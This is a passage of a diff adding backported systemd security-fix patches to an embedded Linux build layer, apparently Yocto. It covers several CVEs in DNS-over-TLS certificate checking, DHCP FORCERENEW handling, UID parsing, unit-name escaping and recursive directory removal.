+(cherry picked from commit eec394f10bbfcc3d2fc8504ad8ff5be44231abd5)
+
+CVE: CVE-2018-21029
+Upstream-Status: Backport [ff26d281aec0877b43269f18c6282cd79a7f5529]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ man/resolved.conf.xml                 | 16 +++++++++++-----
+ src/resolve/resolved-dnstls-gnutls.c  | 20 ++++++++++++--------
+ src/resolve/resolved-dnstls-openssl.c | 15 +++++++++++----
+ 3 files changed, 34 insertions(+), 17 deletions(-)
+
+diff --git a/man/resolved.conf.xml b/man/resolved.conf.xml
+index 818000145b..37161ebcbc 100644
+--- a/man/resolved.conf.xml
++++ b/man/resolved.conf.xml
+@@ -193,11 +193,17 @@
+       <varlistentry>
+         <term><varname>DNSOverTLS=</varname></term>
+         <listitem>
+-        <para>Takes a boolean argument or <literal>opportunistic</literal>.
+-        If true all connections to the server will be encrypted. Note that
+-        this mode requires a DNS server that supports DNS-over-TLS and has
+-        a valid certificate for it's IP. If the DNS server does not support
+-        DNS-over-TLS all DNS requests will fail. When set to <literal>opportunistic</literal>
++        <para>Takes a boolean argument or <literal>opportunistic</literal>. If
++        true all connections to the server will be encrypted. Note that this
++        mode requires a DNS server that supports DNS-over-TLS and has a valid
++        certificate. If the hostname was specified in <varname>DNS=</varname>
++        by using the format format <literal>address#server_name</literal> it
++        is used to validate its certificate and also to enable Server Name
++        Indication (SNI) when opening a TLS connection. Otherwise
++        the certificate is checked against the server's IP.
++        If the DNS server does not support DNS-over-TLS all DNS requests will fail.</para>
++
++        <para>When set to <literal>opportunistic</literal>
+         DNS request are attempted to send encrypted with DNS-over-TLS.
+         If the DNS server does not support TLS, DNS-over-TLS is disabled.
+         Note that this mode makes DNS-over-TLS vulnerable to "downgrade"
+diff --git a/src/resolve/resolved-dnstls-gnutls.c b/src/resolve/resolved-dnstls-gnutls.c
+index ed0a31e8bf..c7215723a7 100644
+--- a/src/resolve/resolved-dnstls-gnutls.c
++++ b/src/resolve/resolved-dnstls-gnutls.c
+@@ -56,15 +56,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+         }
+ 
+         if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+-                stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
+-                if (server->family == AF_INET) {
+-                        stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
+-                        stream->dnstls_data.validation.size = 4;
+-                } else {
+-                        stream->dnstls_data.validation.data = server->address.in6.s6_addr;
+-                        stream->dnstls_data.validation.size = 16;
++                if (server->server_name)
++                        gnutls_session_set_verify_cert(gs, server->server_name, 0);
++                else {
++                        stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
++                        if (server->family == AF_INET) {
++                                stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
++                                stream->dnstls_data.validation.size = 4;
++                        } else {
++                                stream->dnstls_data.validation.data = server->address.in6.s6_addr;
++                                stream->dnstls_data.validation.size = 16;
++                        }
++                        gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+                 }
+-                gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+         }
+ 
+         gnutls_handshake_set_timeout(gs, GNUTLS_DEFAULT_HANDSHAKE_TIMEOUT);
+diff --git a/src/resolve/resolved-dnstls-openssl.c b/src/resolve/resolved-dnstls-openssl.c
+index 85e202ff74..007aedaa5b 100644
+--- a/src/resolve/resolved-dnstls-openssl.c
++++ b/src/resolve/resolved-dnstls-openssl.c
+@@ -6,6 +6,7 @@
+ 
+ #include <openssl/bio.h>
+ #include <openssl/err.h>
++#include <openssl/x509v3.h>
+ 
+ #include "io-util.h"
+ #include "resolved-dns-stream.h"
+@@ -78,13 +79,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+ 
+         if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+                 X509_VERIFY_PARAM *v;
+-                const unsigned char *ip;
+ 
+                 SSL_set_verify(s, SSL_VERIFY_PEER, NULL);
+                 v = SSL_get0_param(s);
+-                ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
+-                if (!X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)))
+-                        return -ECONNREFUSED;
++                if (server->server_name) {
++                        X509_VERIFY_PARAM_set_hostflags(v, X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS);
++                        if (X509_VERIFY_PARAM_set1_host(v, server->server_name, 0) == 0)
++                                return -ECONNREFUSED;
++                } else {
++                        const unsigned char *ip;
++                        ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
++                        if (X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)) == 0)
++                                return -ECONNREFUSED;
++                }
+         }
+ 
+         ERR_clear_error();
+-- 
+2.40.1
+
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
new file mode 100644
index 0000000000..6b499efbd8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
@@ -0,0 +1,42 @@
+From 38e980a6a5a3442c2f48b1f827284388096d8ca5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:22:07 +0900
+Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
+
+This makes DHCP client ignore FORCERENEW requests, as unauthenticated
+FORCERENEW requests causes a security issue (TALOS-2020-1142, CVE-2020-13529).
+
+Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
+and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
+
+Fixes #16774.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/38e980a6a5a3442c2f48b1f827284388096d8ca5]
+CVE: CVE-2020-13529
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1392,9 +1392,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
+         if (r != DHCP_FORCERENEW)
+                 return -ENOMSG;
+
++#if 0
+         log_dhcp_client(client, "FORCERENEW");
+
+         return 0;
++#else
++        /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
++         * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
++         * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
++        log_dhcp_client(client, "Received FORCERENEW, ignoring.");
++        return -ENOMSG;
++#endif
+ }
+
+ static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
deleted file mode 100644
index 7b5e3e7f7a..0000000000
--- a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 156a5fd297b61bce31630d7a52c15614bf784843 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
-Date: Sun, 31 May 2020 18:21:09 +0200
-Subject: [PATCH 1/1] basic/user-util: always use base 10 for user/group
- numbers
-
-We would parse numbers with base prefixes as user identifiers. For example,
-"0x2b3bfa0" would be interpreted as UID==45334432 and "01750" would be
-interpreted as UID==1000. This parsing was used also in cases where either a
-user/group name or number may be specified. This means that names like
-0x2b3bfa0 would be ambiguous: they are a valid user name according to our
-documented relaxed rules, but they would also be parsed as numeric uids.
-
-This behaviour is definitely not expected by users, since tools generally only
-accept decimal numbers (e.g. id, getent passwd), while other tools only accept
-user names and thus will interpret such strings as user names without even
-attempting to convert them to numbers (su, ssh). So let's follow suit and only
-accept numbers in decimal notation. Effectively this means that we will reject
-such strings as a username/uid/groupname/gid where strict mode is used, and try
-to look up a user/group with such a name in relaxed mode.
-
-Since the function changed is fairly low-level and fairly widely used, this
-affects multiple tools: loginctl show-user/enable-linger/disable-linger foo',
-the third argument in sysusers.d, fourth and fifth arguments in tmpfiles.d,
-etc.
-
-Fixes #15985.
----
- src/basic/user-util.c     |  2 +-
- src/test/test-user-util.c | 10 ++++++++++
- 2 files changed, 11 insertions(+), 1 deletion(-)
-
---- end of commit 156a5fd297b61bce31630d7a52c15614bf784843 ---
-
-
-Add definition of safe_atou32_full() from commit b934ac3d6e7dcad114776ef30ee9098693e7ab7e
-
-CVE: CVE-2020-13776
-
-Upstream-Status: Backport [https://github.com/systemd/systemd.git]
-
-Signed-off-by: Joe Slater <joe.slater@windriver.com>
-
-
-
---- git.orig/src/basic/user-util.c
-+++ git/src/basic/user-util.c
-@@ -49,7 +49,7 @@ int parse_uid(const char *s, uid_t *ret)
-         assert(s);
- 
-         assert_cc(sizeof(uid_t) == sizeof(uint32_t));
--        r = safe_atou32(s, &uid);
-+        r = safe_atou32_full(s, 10, &uid);
-         if (r < 0)
-                 return r;
- 
---- git.orig/src/test/test-user-util.c
-+++ git/src/test/test-user-util.c
-@@ -48,9 +48,19 @@ static void test_parse_uid(void) {
- 
-         r = parse_uid("65535", &uid);
-         assert_se(r == -ENXIO);
-+        assert_se(uid == 100);
-+
-+        r = parse_uid("0x1234", &uid);
-+        assert_se(r == -EINVAL);
-+        assert_se(uid == 100);
-+
-+        r = parse_uid("01234", &uid);
-+        assert_se(r == 0);
-+        assert_se(uid == 1234);
- 
-         r = parse_uid("asdsdas", &uid);
-         assert_se(r == -EINVAL);
-+        assert_se(uid == 1234);
- }
- 
- static void test_uid_ptr(void) {
---- git.orig/src/basic/parse-util.h
-+++ git/src/basic/parse-util.h
-@@ -45,9 +45,13 @@ static inline int safe_atoux16(const cha
- 
- int safe_atoi16(const char *s, int16_t *ret);
- 
--static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+static inline int safe_atou32_full(const char *s, unsigned base, uint32_t *ret_u) {
-         assert_cc(sizeof(uint32_t) == sizeof(unsigned));
--        return safe_atou(s, (unsigned*) ret_u);
-+        return safe_atou_full(s, base, (unsigned*) ret_u);
-+}
-+
-+static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+        return safe_atou32_full(s, 0, (unsigned*) ret_u);
- }
- 
- static inline int safe_atoi32(const char *s, int32_t *ret_i) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
new file mode 100644
index 0000000000..e92d721d3d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
@@ -0,0 +1,67 @@
+Backport of:
+
+From 441e0115646d54f080e5c3bb0ba477c892861ab9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 23 Jun 2021 11:46:41 +0200
+Subject: [PATCH 1/2] basic/unit-name: do not use strdupa() on a path
+
+The path may have unbounded length, for example through a fuse mount.
+
+CVE-2021-33910: attacked controlled alloca() leads to crash in systemd and
+ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
+and each mountpoint is passed to mount_setup_unit(), which calls
+unit_name_path_escape() underneath. A local attacker who is able to mount a
+filesystem with a very long path can crash systemd and the whole system.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1970887
+
+The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
+can't easily check the length after simplification before doing the
+simplification, which in turns uses a copy of the string we can write to.
+So we can't reject paths that are too long before doing the duplication.
+Hence the most obvious solution is to switch back to strdup(), as before
+7410616cd9dbbec97cf98d75324da5cda2b2f7a2.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9]
+CVE: CVE-2021-33910
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/unit-name.c | 13 +++++--------
+ 1 file changed, 5 insertions(+), 8 deletions(-)
+
+--- a/src/basic/unit-name.c
++++ b/src/basic/unit-name.c
+@@ -369,12 +369,13 @@ int unit_name_unescape(const char *f, char **ret) {
+ }
+
+ int unit_name_path_escape(const char *f, char **ret) {
+-        char *p, *s;
++        _cleanup_free_ char *p = NULL;
++        char *s;
+
+         assert(f);
+         assert(ret);
+
+-        p = strdupa(f);
++        p = strdup(f);
+         if (!p)
+                 return -ENOMEM;
+
+@@ -386,13 +387,9 @@ int unit_name_path_escape(const char *f, char **ret) {
+                 if (!path_is_normalized(p))
+                         return -EINVAL;
+
+-                /* Truncate trailing slashes */
++                /* Truncate trailing slashes and skip leading slashes */
+                 delete_trailing_chars(p, "/");
+-
+-                /* Truncate leading slashes */
+-                p = skip_leading_chars(p, "/");
+-
+-                s = unit_name_escape(p);
++                s = unit_name_escape(skip_leading_chars(p, "/"));
+         }
+         if (!s)
+                 return -ENOMEM;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
new file mode 100644
index 0000000000..341976822b
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
@@ -0,0 +1,65 @@
+Backport of the following upstream commit:
+From fbb77e1e55866633c9f064e2b3bcf2b6402d962d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 15:55:45 +0100
+Subject: [PATCH 1/3] shared/rm_rf: refactor rm_rf_children_inner() to shorten
+ code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 27 +++++++++------------------
+ 1 file changed, 9 insertions(+), 18 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -34,7 +34,7 @@
+                 const struct stat *root_dev) {
+ 
+         struct stat st;
+-        int r;
++        int r, q = 0;
+ 
+         assert(fd >= 0);
+         assert(fname);
+@@ -50,7 +50,6 @@
+ 
+         if (is_dir) {
+                 _cleanup_close_ int subdir_fd = -1;
+-                int q;
+ 
+                 /* if root_dev is set, remove subdirectories only if device is same */
+                 if (root_dev && st.st_dev != root_dev->st_dev)
+@@ -86,23 +85,15 @@
+                  * again for each directory */
+                 q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+ 
+-                r = unlinkat(fd, fname, AT_REMOVEDIR);
+-                if (r < 0)
+-                        return r;
+-                if (q < 0)
+-                        return q;
+-
+-                return 1;
+-
+-        } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+-                r = unlinkat(fd, fname, 0);
+-                if (r < 0)
+-                        return r;
+-
+-                return 1;
+-        }
++        } else if (flags & REMOVE_ONLY_DIRECTORIES)
++                return 0;
+ 
+-        return 0;
++        r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0);
++        if (r < 0)
++                return r;
++        if (q < 0)
++                return q;
++        return 1;
+ }
+ 
+ int rm_rf_children(
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
new file mode 100644
index 0000000000..066e10fbbc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
@@ -0,0 +1,101 @@
+Backport of the following upstream commit:
+From bd0127daaaae009ade053718f7d2f297aee4acaf Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 16:56:42 +0100
+Subject: [PATCH 2/3] shared/rm_rf: refactor rm_rf() to shorten code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 53 ++++++++++++++++++++--------------------------
+ 1 file changed, 23 insertions(+), 30 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -159,7 +159,7 @@
+ }
+ 
+ int rm_rf(const char *path, RemoveFlags flags) {
+-        int fd, r;
++        int fd, r, q = 0;
+ 
+         assert(path);
+ 
+@@ -191,49 +191,47 @@
+         }
+ 
+         fd = open(path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+-        if (fd < 0) {
++        if (fd >= 0) {
++                /* We have a dir */
++                r = rm_rf_children(fd, flags, NULL);
++
++                if (FLAGS_SET(flags, REMOVE_ROOT)) {
++                        q = rmdir(path);
++                        if (q < 0)
++                                q = -errno;
++                }
++        } else {
+                 if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+                         return 0;
+ 
+                 if (!IN_SET(errno, ENOTDIR, ELOOP))
+                         return -errno;
+ 
+-                if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES))
++                if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES) || !FLAGS_SET(flags, REMOVE_ROOT))
+                         return 0;
+ 
+-                if (FLAGS_SET(flags, REMOVE_ROOT)) {
+-
+-                        if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
+-                                struct statfs s;
+-
+-                                if (statfs(path, &s) < 0)
+-                                        return -errno;
+-                                if (is_physical_fs(&s))
+-                                        return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+-                                                               "Attempted to remove files from a disk file system under \"%s\", refusing.",
+-                                                               path);
+-                        }
+-
+-                        if (unlink(path) < 0) {
+-                                if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+-                                        return 0;
++                if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++                        struct statfs s;
+ 
++                        if (statfs(path, &s) < 0)
+                                 return -errno;
+-                        }
++                        if (is_physical_fs(&s))
++                                return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++                                                       "Attempted to remove files from a disk file system under \"%s\", refusing.",
++                                                       path);
+                 }
+ 
+-                return 0;
++                r = 0;
++                q = unlink(path);
++                if (q < 0)
++                        q = -errno;
+         }
+ 
+-        r = rm_rf_children(fd, flags, NULL);
+-
+-        if (FLAGS_SET(flags, REMOVE_ROOT) &&
+-            rmdir(path) < 0 &&
+-            r >= 0 &&
+-            (!FLAGS_SET(flags, REMOVE_MISSING_OK) || errno != ENOENT))
+-                r = -errno;
+-
+-        return r;
++        if (r < 0)
++                return r;
++        if (q < 0 && (q != -ENOENT || !FLAGS_SET(flags, REMOVE_MISSING_OK)))
++                return q;
++        return 0;
+ }
+ 
+ int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
new file mode 100644
index 0000000000..c96b8d9a6e
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
@@ -0,0 +1,266 @@
+Backport of the following upstream commit:
+From bef8e8e577368697b2e6f85183b1dbc99e0e520f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 30 Nov 2021 22:29:05 +0100
+Subject: [PATCH 3/3] shared/rm-rf: loop over nested directories instead of
+ instead of recursing
+
+To remove directory structures, we need to remove the innermost items first,
+and then recursively remove higher-level directories. We would recursively
+descend into directories and invoke rm_rf_children and rm_rm_children_inner.
+This is problematic when too many directories are nested.
+
+Instead, let's create a "TODO" queue. In the the queue, for each level we
+hold the DIR* object we were working on, and the name of the directory. This
+allows us to leave a partially-processed directory, and restart the removal
+loop one level down. When done with the inner directory, we use the name to
+unlinkat() it from the parent, and proceed with the removal of other items.
+
+Because the nesting is increased by one level, it is best to view this patch
+with -b/--ignore-space-change.
+
+This fixes CVE-2021-3997, https://bugzilla.redhat.com/show_bug.cgi?id=2024639.
+The issue was reported and patches reviewed by Qualys Team.
+Mauro Matteo Cascella and Riccardo Schirone from Red Hat handled the disclosure.
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 161 +++++++++++++++++++++++++++++++--------------
+ 1 file changed, 113 insertions(+), 48 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -26,12 +26,13 @@
+         return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+ 
+-static int rm_rf_children_inner(
++static int rm_rf_inner_child(
+                 int fd,
+                 const char *fname,
+                 int is_dir,
+                 RemoveFlags flags,
+-                const struct stat *root_dev) {
++                const struct stat *root_dev,
++                bool allow_recursion) {
+ 
+         struct stat st;
+         int r, q = 0;
+@@ -49,9 +50,7 @@
+         }
+ 
+         if (is_dir) {
+-                _cleanup_close_ int subdir_fd = -1;
+-
+-                /* if root_dev is set, remove subdirectories only if device is same */
++                /* If root_dev is set, remove subdirectories only if device is same */
+                 if (root_dev && st.st_dev != root_dev->st_dev)
+                         return 0;
+ 
+@@ -63,7 +62,6 @@
+                         return 0;
+ 
+                 if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+                         /* This could be a subvolume, try to remove it */
+ 
+                         r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+@@ -77,13 +75,16 @@
+                                 return 1;
+                 }
+ 
+-                subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++                if (!allow_recursion)
++                        return -EISDIR;
++
++                int subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+                 if (subdir_fd < 0)
+                         return -errno;
+ 
+                 /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
+                  * again for each directory */
+-                q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++                q = rm_rf_children(subdir_fd, flags | REMOVE_PHYSICAL, root_dev);
+ 
+         } else if (flags & REMOVE_ONLY_DIRECTORIES)
+                 return 0;
+@@ -96,64 +97,128 @@
+         return 1;
+ }
+ 
++typedef struct TodoEntry {
++        DIR *dir;         /* A directory that we were operating on. */
++        char *dirname;    /* The filename of that directory itself. */
++} TodoEntry;
++
++static void free_todo_entries(TodoEntry **todos) {
++        for (TodoEntry *x = *todos; x && x->dir; x++) {
++                closedir(x->dir);
++                free(x->dirname);
++        }
++
++        freep(todos);
++}
++
+ int rm_rf_children(
+                 int fd,
+                 RemoveFlags flags,
+                 const struct stat *root_dev) {
+ 
+-        _cleanup_closedir_ DIR *d = NULL;
+-        struct dirent *de;
++        _cleanup_(free_todo_entries) TodoEntry *todos = NULL;
++        size_t n_todo = 0, allocated = 0;
++        _cleanup_free_ char *dirname = NULL; /* Set when we are recursing and want to delete ourselves */
+         int ret = 0, r;
+ 
+-        assert(fd >= 0);
++        /* Return the first error we run into, but nevertheless try to go on.
++         * The passed fd is closed in all cases, including on failure. */
+ 
+-        /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+-         * fd, in all cases, including on failure. */
++        for (;;) {  /* This loop corresponds to the directory nesting level. */
++                _cleanup_closedir_ DIR *d = NULL;
++                struct dirent *de;
++
++                if (n_todo > 0) {
++                        /* We know that we are in recursion here, because n_todo is set.
++                         * We need to remove the inner directory we were operating on. */
++                        assert(dirname);
++                        r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);
++                        if (r < 0 && r != -ENOENT && ret == 0)
++                                ret = r;
++                        dirname = mfree(dirname);
++
++                        /* And now let's back out one level up */
++                        n_todo --;
++                        d = TAKE_PTR(todos[n_todo].dir);
++                        dirname = TAKE_PTR(todos[n_todo].dirname);
++
++                        assert(d);
++                        fd = dirfd(d); /* Retrieve the file descriptor from the DIR object */
++                        assert(fd >= 0);
++                } else {
++        next_fd:
++                        assert(fd >= 0);
++                        d = fdopendir(fd);
++                        if (!d) {
++                                safe_close(fd);
++                                return -errno;
++                        }
++                        fd = dirfd(d); /* We donated the fd to fdopendir(). Let's make sure we sure we have
++                                        * the right descriptor even if it were to internally invalidate the
++                                        * one we passed. */
++
++                        if (!(flags & REMOVE_PHYSICAL)) {
++                                struct statfs sfs;
++
++                                if (fstatfs(fd, &sfs) < 0)
++                                        return -errno;
++
++                                if (is_physical_fs(&sfs)) {
++                                        /* We refuse to clean physical file systems with this call, unless
++                                         * explicitly requested. This is extra paranoia just to be sure we
++                                         * never ever remove non-state data. */
++
++                                        _cleanup_free_ char *path = NULL;
++
++                                        (void) fd_get_path(fd, &path);
++                                        return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++                                                               "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++                                                               strna(path));
++                                }
++                        }
++                }
+ 
+-        d = fdopendir(fd);
+-        if (!d) {
+-                safe_close(fd);
+-                return -errno;
+-        }
++                FOREACH_DIRENT_ALL(de, d, return -errno) {
++                        int is_dir;
+ 
+-        if (!(flags & REMOVE_PHYSICAL)) {
+-                struct statfs sfs;
++                        if (dot_or_dot_dot(de->d_name))
++                                continue;
+ 
+-                if (fstatfs(dirfd(d), &sfs) < 0)
+-                        return -errno;
+-                }
++                        is_dir = de->d_type == DT_UNKNOWN ? -1 : de->d_type == DT_DIR;
+ 
+-                if (is_physical_fs(&sfs)) {
+-                        /* We refuse to clean physical file systems with this call, unless explicitly
+-                         * requested. This is extra paranoia just to be sure we never ever remove non-state
+-                         * data. */
+-
+-                        _cleanup_free_ char *path = NULL;
+-
+-                        (void) fd_get_path(fd, &path);
+-                        return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+-                                               "Attempted to remove disk file system under \"%s\", and we can't allow that.",
+-                                               strna(path));
+-                }
+-        }
++                        r = rm_rf_inner_child(fd, de->d_name, is_dir, flags, root_dev, false);
++                        if (r == -EISDIR) {
++                                /* Push the current working state onto the todo list */
+ 
+-        FOREACH_DIRENT_ALL(de, d, return -errno) {
+-                int is_dir;
++                                if (!GREEDY_REALLOC0(todos, allocated, n_todo + 2))
++                                        return log_oom();
+ 
+-                if (dot_or_dot_dot(de->d_name))
+-                        continue;
++                                 _cleanup_free_ char *newdirname = strdup(de->d_name);
++                                 if (!newdirname)
++                                         return log_oom();
+ 
+-                is_dir =
+-                        de->d_type == DT_UNKNOWN ? -1 :
+-                        de->d_type == DT_DIR;
+-
+-                r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
+-                if (r < 0 && r != -ENOENT && ret == 0)
+-                        ret = r;
+-        }
++                                 int newfd = openat(fd, de->d_name,
++                                                    O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++                                 if (newfd >= 0) {
++                                         todos[n_todo++] = (TodoEntry) { TAKE_PTR(d), TAKE_PTR(dirname) };
++                                         fd = newfd;
++                                         dirname = TAKE_PTR(newdirname);
++
++                                         goto next_fd;
+ 
+-        if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
+-                ret = -errno;
++                                 } else if (errno != -ENOENT && ret == 0)
++                                         ret = -errno;
++
++                        } else if (r < 0 && r != -ENOENT && ret == 0)
++                                ret = r;
++                }
++
++                if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(fd) < 0 && ret >= 0)
++                        ret = -errno;
++
++                if (n_todo == 0)
++                        break;
++        }
+ 
+         return ret;
+ }
+@@ -250,5 +315,5 @@
+         if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
+                 return -EINVAL;
+ 
+-        return rm_rf_children_inner(fd, name, -1, flags, NULL);
++        return rm_rf_inner_child(fd, name, -1, flags, NULL, true);
+ }
diff --git a/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
new file mode 100644
index 0000000000..f9c6704cfc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
@@ -0,0 +1,47 @@
+From 9102c625a673a3246d7e73d8737f3494446bad4e Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 7 Jul 2022 18:27:02 +0900
+Subject: [PATCH] time-util: fix buffer-over-run
+
+Fixes #23928.
+
+CVE: CVE-2022-3821
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Both the hunks refreshed to backport
+
+---
+ src/basic/time-util.c     | 2 +-
